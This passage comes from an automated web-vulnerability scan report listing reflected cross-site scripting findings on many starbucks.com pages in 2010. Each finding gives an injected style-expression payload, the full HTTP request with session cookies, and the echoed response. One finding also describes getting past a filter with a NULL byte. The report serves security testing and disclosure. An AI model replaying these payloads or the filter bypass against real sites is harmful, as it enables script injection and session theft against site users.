GET /coffee/whole-bean-coffee/asia-pacific?5d4f5"style%3d"x%3aexpression(alert(1))"07322c9d36a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:23 GMT
Connection: close
Content-Length: 40730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific?5d4f5"style="x:expression(alert(1))"07322c9d36a=1"/>
...[SNIP]...

3.23. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/dark-and-specialty-roast

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc378"style%3d"x%3aexpression(alert(1))"dc2a561ad6f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc378"style="x:expression(alert(1))"dc2a561ad6f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/dark-and-specialty-roast?bc378"style%3d"x%3aexpression(alert(1))"dc2a561ad6f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:32:57 GMT
Connection: close
Content-Length: 42564

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast?bc378"style="x:expression(alert(1))"dc2a561ad6f=1"/>
...[SNIP]...

3.24. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/latin-america

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ed27"style%3d"x%3aexpression(alert(1))"54fc7b2d713 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9ed27"style="x:expression(alert(1))"54fc7b2d713 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/latin-america?9ed27"style%3d"x%3aexpression(alert(1))"54fc7b2d713=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:15 GMT
Connection: close
Content-Length: 44497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/latin-america?9ed27"style="x:expression(alert(1))"54fc7b2d713=1"/>
...[SNIP]...

3.25. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/multi-region-blends

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f92e"style%3d"x%3aexpression(alert(1))"69974f7cbb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2f92e"style="x:expression(alert(1))"69974f7cbb4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/multi-region-blends?2f92e"style%3d"x%3aexpression(alert(1))"69974f7cbb4=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:29 GMT
Connection: close
Content-Length: 44773

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends?2f92e"style="x:expression(alert(1))"69974f7cbb4=1"/>
...[SNIP]...

3.26. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68bf7"style%3d"x%3aexpression(alert(1))"0236f70923d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68bf7"style="x:expression(alert(1))"0236f70923d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend?68bf7"style%3d"x%3aexpression(alert(1))"0236f70923d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:22 GMT
Connection: close
Content-Length: 41054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend?68bf7"style="x:expression(alert(1))"0236f70923d=1"/>
...[SNIP]...

3.27. http://www.starbucks.com/customer-service/faqs/coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8de96"style%3d"x%3aexpression(alert(1))"6b0cfc1dd14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8de96"style="x:expression(alert(1))"6b0cfc1dd14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /customer-service/faqs/coffee?8de96"style%3d"x%3aexpression(alert(1))"6b0cfc1dd14=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:21:45 GMT
Connection: close
Content-Length: 37419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/coffee?8de96"style="x:expression(alert(1))"6b0cfc1dd14=1"/>
...[SNIP]...

3.28. http://www.starbucks.com/menu [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12942"style%3d"x%3aexpression(alert(1))"90f8a013063 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12942"style="x:expression(alert(1))"90f8a013063 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu?12942"style%3d"x%3aexpression(alert(1))"90f8a013063=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:32 GMT
Content-Length: 72476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu?12942"style="x:expression(alert(1))"90f8a013063=1"/>
...[SNIP]...

3.29. http://www.starbucks.com/menu/drinks [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50acb"style%3d"x%3aexpression(alert(1))"842d349c684 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 50acb"style="x:expression(alert(1))"842d349c684 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks?50acb"style%3d"x%3aexpression(alert(1))"842d349c684=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:18:14 GMT
Connection: close
Content-Length: 61971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks?50acb"style="x:expression(alert(1))"842d349c684=1"/>
...[SNIP]...

3.30. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1532"style%3d"x%3aexpression(alert(1))"3f7f1489b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f1532"style="x:expression(alert(1))"3f7f1489b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages?f1532"style%3d"x%3aexpression(alert(1))"3f7f1489b5=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:12:51 GMT
Connection: close
Content-Length: 50806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages?f1532"style="x:expression(alert(1))"3f7f1489b5=1"/>
...[SNIP]...

3.31. http://www.starbucks.com/menu/food [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5cc1"style%3d"x%3aexpression(alert(1))"ffcdae7abe1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c5cc1"style="x:expression(alert(1))"ffcdae7abe1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food?c5cc1"style%3d"x%3aexpression(alert(1))"ffcdae7abe1=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:18:45 GMT
Connection: close
Content-Length: 56860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food?c5cc1"style="x:expression(alert(1))"ffcdae7abe1=1"/>
...[SNIP]...

3.32. http://www.starbucks.com/menu/food/bakery/cranberry-bliss-bar [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/cranberry-bliss-bar

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78c8e"style%3d"x%3aexpression(alert(1))"9db2eb51a72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 78c8e"style="x:expression(alert(1))"9db2eb51a72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/cranberry-bliss-bar?78c8e"style%3d"x%3aexpression(alert(1))"9db2eb51a72=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:04:47 GMT
Connection: close
Content-Length: 41261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/cranberry-bliss-bar?78c8e"style="x:expression(alert(1))"9db2eb51a72=1"/>
...[SNIP]...

3.33. http://www.starbucks.com/menu/nutrition [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bff8"style%3d"x%3aexpression(alert(1))"2562d6e92e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2bff8"style="x:expression(alert(1))"2562d6e92e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/nutrition?2bff8"style%3d"x%3aexpression(alert(1))"2562d6e92e2=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:19:06 GMT
Connection: close
Content-Length: 48718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/nutrition?2bff8"style="x:expression(alert(1))"2562d6e92e2=1"/>
...[SNIP]...

3.34. http://www.starbucks.com/menu/nutrition/20-under-200 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition/20-under-200

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1e9e"style%3d"x%3aexpression(alert(1))"6d79117ac61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1e9e"style="x:expression(alert(1))"6d79117ac61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks, but this filtering can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) written in native code, where strings are terminated by a NULL byte, so the filter stops inspecting input at the %00 while the application continues to process the rest. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /menu/nutrition/20-under-200?d1e9e"style%3d"x%3aexpression(alert(1))"6d79117ac61=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:21:19 GMT
Connection: close
Content-Length: 38226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/nutrition/20-under-200?d1e9e"style="x:expression(alert(1))"6d79117ac61=1"/>
...[SNIP]...

3.35. http://www.starbucks.com/menu/nutrition/20-under-200 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition/20-under-200

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cccd"style%3d"x%3aexpression(alert(1))"1d36dcad9c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5cccd"style="x:expression(alert(1))"1d36dcad9c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/nutrition/20-under-200?5cccd"style%3d"x%3aexpression(alert(1))"1d36dcad9c6=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:11 GMT
Content-Length: 38226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/nutrition/20-under-200?5cccd"style="x:expression(alert(1))"1d36dcad9c6=1"/>
...[SNIP]...

3.36. http://www.starbucks.com/menu/nutrition/35-under-350 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition/35-under-350

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6282"style%3d"x%3aexpression(alert(1))"6302ba5a92f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c6282"style="x:expression(alert(1))"6302ba5a92f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/nutrition/35-under-350?c6282"style%3d"x%3aexpression(alert(1))"6302ba5a92f=1 HTTP/1.1
